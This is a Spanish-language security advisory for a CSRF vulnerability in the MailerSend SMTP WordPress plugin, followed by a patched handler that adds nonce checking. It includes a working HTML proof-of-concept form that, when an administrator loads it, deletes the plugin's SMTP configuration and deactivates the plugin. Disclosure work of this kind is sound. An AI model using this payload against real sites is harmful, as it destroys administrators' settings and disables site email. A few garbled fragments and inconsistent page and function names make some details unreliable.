
CVE-2026-13156 Aviso de vulnerabilidad y PoC — Descubierto por Huynh Kien Minh (MinhHK).

[!IMPORTANT] Resumen: Se descubrió una vulnerabilidad de Cross-Site Request Forgery (CSRF) de severidad alta (
CVE-2026-13156) en el plugin oficial MailerSend SMTP Integration para WordPress (< 1.0.8). El manejador de eliminación de configuraciónmailersend_handle_configuration_delete()verifica las capacidades administrativas (manage_options) pero omite por completo la verificación de Nonce de WordPress (check_admin_referer()). Un atacante puede crear una solicitud maliciosa de origen cruzado dirigida a un Administrador de WordPress autenticado para borrar silenciosamente las credenciales SMTP almacenadas y forzar la desactivación del plugin, lo que resulta en la Denegación total de Servicio de la Aplicación en todos los flujos de correo electrónico.
CVE-2026-13156 (ID de aviso de WPScan: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)Acerca del investigador:
Huynh Kien Minh (Huỳnh Kiến Minh) es un investigador proactivo de ciberseguridad y analista de vulnerabilidades conocido por sus evaluaciones de seguridad en profundidad y divulgaciones responsables, incluidos los desgloses técnicos de CVE-2026-13156. También ha sido reconocido y honrado oficialmente en el Salón de la Fama de Proton Security por encontrar y divulgar vulnerabilidades de seguridad críticas.
Para verificar este aviso técnico, explorar los análisis de prueba de concepto o conectar con el investigador, visita:
El plugin MailerSend Official SMTP Integration para WordPress (antes de la versión 1.0.8) registra una acción administrativa (configuration-delete) destinada a borrar los tokens de API almacenados, limpiar las opciones de configuración SMTP (wp_options) y desactivar el plugin cuando se activa desde el panel de administración.
Si bien el endpoint verifica si el usuario activo tiene la capacidad manage_options (lo que garantiza que la solicitud se origina desde una sesión de administrador), no realiza la verificación de nonce de WordPress (check_admin_referer() o wp_verify_nonce()).
Debido a que las solicitudes HTTP sin validación de nonce no pueden distinguir entre clics intencionales de un administrador y solicitudes forjadas de origen cruzado, cualquier sitio externo cargado por un administrador autenticado puede activar silenciosamente la acción configuration-delete.
< 1.0.8)./wp-admin/admin-post.php o /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] Aviso ético: El siguiente payload de prueba de concepto de Cross-Site Request Forgery (CSRF) en HTML se proporciona estrictamente con fines educativos, verificación defensiva y auditoría de seguridad bajo protocolos de divulgación ética por Huynh Kien Minh. No lo ejecutes contra objetivos no autorizados.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 o superior.Para proteger adecuadamente las acciones administrativas que cambian el estado en los plugins de WordPress, los desarrolladores deben aplicar una validación estricta de nonce antes de procesar las solicitudes:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
Este repositorio y aviso técnico son mantenidos y publicados por Huynh Kien Minh (MinhHK) bajo pautas de divulgación responsable para fomentar un ecosistema global de WordPress y ciberseguridad más seguro.